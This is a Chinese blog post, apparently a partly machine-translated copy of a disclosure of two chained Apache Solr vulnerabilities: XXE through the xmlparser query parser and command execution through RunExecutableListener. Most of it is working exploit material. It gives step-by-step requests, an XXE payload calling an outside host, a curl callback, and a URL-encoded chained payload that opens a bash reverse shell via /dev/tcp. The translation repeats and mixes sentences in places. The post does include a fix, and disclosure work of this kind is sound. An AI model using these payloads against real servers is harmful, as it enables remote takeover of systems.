Finger
一只孤独的代码狗/程序猿/攻城狮

Solr是一个独立的企业搜索服务器,具有类似REST的API。您通过JSON,XML,CSV或二进制文件通过HTTP将文档(称为“索引”)放入其中。您可以通过HTTP GET进行查询,并接收JSON,XML,CSV或二进制结果。

第一漏洞:XML外部实体扩展(deftype = xmlparser)

Lucene包括一个使用XML数据结构创建全面的Lucene查询的查询解析器。从版本5.1开始,Solr在搜索查询中支持“xml”查询解析器。

问题是lucene xml解析器没有明确禁止外部实体的doctype声明和扩展。可以在xml文档中包含特殊实体,指向外部文件(通过文件://)或外部URL(通过http://):

示例用法: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"'><a></a>'}

当Solr解析此请求时,它会向http://xxx.s.artsploit.com/xxx发出HTTP请求,并将其内容视为DOCTYPE定义。

考虑到我们可以在搜索查询中定义解析器类型,这通常来自不受信任的用户输入,例如网站上的搜索字段。它允许外部攻击者向本地SOLR实例发出任意HTTP请求,并绕过所有防火墙限制。

例如,此漏洞可能是用户将恶意数据发送到’/ upload’处理程序:

示例用法: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"'><a></a>'}

例如,此漏洞可能是用户将恶意数据发送到’/ upload’处理程序:http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE definition.

此漏洞也可以使用ftp wrapper作为Blind XXE,以从solrserver中读取任意本地文件。

弱势代码位置:

/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java

static Document parseXML(InputStream pXmlFile)throws ParserException {

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 DocumentBuilder db = null;
 try {
 db = dbf.newDocumentBuilder();
 }
 catch (Exception se) {
 throw new ParserException("XML Parser configuration error", se);
 }
 org.w3c.dom.Document doc = null;
 try {
 doc = db.parse(pXmlFile);
 }

Steps to reproduce:

复制步骤:

1.使用netcat命令“nc -lv 4444”在任何端口设置一个监听器
2.打开http:// localhost:8983 / solr / gettingstarted / select?q = {!xmlparser v ='<!DOCTYPE a SYSTEM“ http:// localhost:4444 / execution“> <a> </a>'} 
3.您将在Netcat侦听器上看到Solr服务器的请求。证明DOCTYPE声明已解决。

临时补救建议:

考虑添加以下行

/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java:
static Document parseXML(InputStream pXmlFile)throws ParserException { 
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); 
 DocumentBuilder db = null;

 

尝试{ 
 //protect from XXE attacks
 dbf.setFeature(“ http://apache.org/xml/features/disallow-doctype-decl”,true); 
 dbf.setFeature(“http://xml.org/sax/features/external-general-entities”,false); 
 dbf.setFeature(“http://xml.org/sax/features/external-parameter-entities”,false);

二漏洞:远程执行代码(add-listener:RunExecutableListener)

Solr“RunExecutableListener”类可用于对特定事件执行任意命令,例如在每次更新查询后执行。问题是这样的监听器可以通过使用带有add-listener命令的Config API来启用任何参数。

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json 
Content-Length: 198
 
{
 "add-listener" : {
 "event":"postCommit",
 "name":"newlistener",
 "class":"solr.RunExecutableListener",
 "exe":"ANYCOMMAND",
 "dir":"/usr/bin/",
 "args":["ANYARGS"]
 }
}

参数“exe”,“args”和“dir”可以通过HTTP请求来修改集合的配置。这意味着任何可以向Solr API发送HTTP请求的人都可以在触发“postCommit”事件时执行任意shell命令。它导致对远程攻击者执行任意远程代码。

复制步骤:

步骤1.创建一个新集合:

http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2

步骤2.使用netcat命令“nc -lv 4444”在任何端口上设置监听器

步骤3.为集合添加一个新的RunExecutableListener监听器,其中“exe”属性包含运行命令的名称(“/ usr / bin / curl”)和“args”属性内容“http:// localhost:4444 / executed”向攻击者的netcat侦听器发出请求:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json 
Content-Length: 198
 
{
 "add-listener" : {
 "event":"postCommit",
 "name":"newlistener",
 "class":"solr.RunExecutableListener",
 "exe":"curl",
 "dir":"/usr/bin/",
 "args":["http://localhost:4444/executed"]
 }
}

步骤4.更新“newcollection”来触发RunExecutableListener的执行:

POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json 
Content-Length: 19
 
[{"id":"test"}]

您将在Netcat侦听器上看到Solr服务器的请求。证明在服务器上执行curl命令。

概要:

通过链接这两个漏洞,即使没有直接访问Solr服务器,外部攻击者也可以实现远程代码执行。唯一的要求是攻击者应该能够指定一个查询的一部分来自“q”
搜索参数(对于许多使用solr的Web应用程序来说,这是一种情况)。

假设我们有一个攻击者只能将搜索查询(“q”param)发送到“/ select”solr端点。
这是完整的漏洞利用场景:

步骤1.通过XXE创建新集合。如果攻击者已经知道任何集合名称,则可以跳过此步骤。

http://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20
Without URL encode:
 
http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/admin/collections?
action=CREATE&name=newcollection&numShards=2"><a></a>'}
 
Step 2. Set up a netcat listener "nc -lv 4444"
 
Step 3. Add a new RunExecutableListener listener via XXE
 
http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%73%65%6c%65%63%74%3f%71%3d%78%78%78%26%71%74%3d%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%63%6f%6e%66%69%67%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%32%35%37%62%25%32%35%32%32%25%32%35%36%31%25%32%35%36%34%25%32%35%36%34%25%32%35%32%64%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%37%62%25%32%35%32%32%25%32%35%36%35%25%32%35%37%36%25%32%35%36%35%25%32%35%36%65%25%32%35%37%34%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%30%25%32%35%36%66%25%32%35%37%33%25%32%35%37%34%25%32%35%34%33%25%32%35%36%66%25%32%35%36%64%25%32%35%36%64%25%32%35%36%39%25%32%35%37%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%65%25%32%35%36%31%25%32%35%36%64%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%36%65%25%32%35%36%35%25%32%35%37%37%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%33%25%32%35%36%63%25%32%35%36%31%25%32%35%37%33%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%66%25%32%35%36%63%25%32%35%37%32%25%32%35%32%65%25%32%35%35%32%25%32%35%37%35%25%32%35%36%65%25%32%35%34%35%25%32%35%37%38%25%32%35%36%35%25%32%35%36%33%25%32%35%37%35%25%32%35%37%34%25%32%35%36%31%25%32%35%36%32%25%32%35%36%63%25%32%35%36%35%25%32%35%34%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%37%38%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%34%25%32%35%36%39%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%31%25%32%35%37%32%25%32%35%36%37%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%35%62%25%32%35%32%32%25%32%35%32%64%25%32%35%36%33%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%34%25%32%35%34%30%25%32%35%37%63%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%65%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%36%33%25%32%35%36%38%25%32%35%36%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%36%32%25%32%35%36%31%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%64%25%32%35%36%39%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%65%25%32%35%32%36%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%34%25%32%35%36%35%25%32%35%37%36%25%32%35%32%66%25%32%35%37%34%25%32%35%36%33%25%32%35%37%30%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%37%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%31%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%33%25%32%35%33%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%30%25%32%35%33%65%25%32%35%32%36%25%32%35%33%31%25%32%35%32%32%25%32%35%35%64%25%32%35%37%64%25%32%35%37%64%26%73%68%61%72%64%73%3d%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%22%3e%3c%61%3e%3c%2f%61%3e%27%7d
 
Without URL encode:
 
http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","/bin/bash","-i",">&","/dev/tcp/127.0.0.1/1234","0>&1"]}}&shards=localhost:8983/"><a></a>'}
 
您可能会注意到,为了更新配置,我们需要向应用程序发送POST请求。但是通过使用XXE漏洞,我们只能发送HTTP GET请求。这里有一个特殊的技巧:如果Solr收到“/ select?q = 123&qt = / xxx&shards = localhost:8983 /”GET请求,它实际上将其转换为POST,并将此请求重定向到“shards”参数中指定的分片。哪个也很酷,它通过“qt”参数覆盖url查询,所以我们可以将它从“/ select”转换为“/ config”。
结果HTTP请求

步骤3.通过XXE更新“newcollection”来触发RunExecutableListener的执行

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM
"http://localhost:8983/solr/newcollection/update?stream.body=[{"id":"AAA"}]&commit=true&overwrite=true"><a></a>'}

Step 5. When the “/bin/sh c $@|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1” command is executed during update, a new shell session will be opened on the netcat listener. An attacker can execute any shell command on the server where Solr is running.

步骤5.当““/bin/sh c $@|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1” “命令在更新期间执行,将在netcat侦听器上打开一个新的shell会话。攻击者可以在运行Solr的服务器上执行任何shell命令。

在所有三个请求中,Solr响应不同的错误,但是所有这些错误都是在执行所需的操作之后发生的。

所有这些漏洞都使用默认的云配置(bin / solr start -e cloud-noprompt)在最新版本的Apache Solr上进行了测试,

这篇文章还没有人发言,快抢第一!

发表评论